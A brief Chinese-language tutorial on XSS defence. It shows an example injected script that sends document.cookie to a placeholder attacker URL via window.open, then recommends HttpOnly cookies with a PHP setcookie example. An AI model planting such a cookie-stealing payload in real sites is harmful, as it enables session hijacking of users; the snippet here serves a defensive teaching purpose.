web安全之xss

1.生成cookie的时候设置httponly为true

如果脚本王子在A网站写入一段js代码：

<script>
    window.open('黑客的url?c='+document.cookie)
</script>

当用户访问到这个页面的时候，就把当前用户在A网站的cookie发送到黑客的网站，这样黑客就顺利拿到这个cookie，就可以冒充当前用户了。

设置cookie的时候要开启httponly，让浏览器拿不到cookie。

setcookie ($name, $value = null, $expire = null, $path = null, $domain = null, $secure = null, $httponly = true)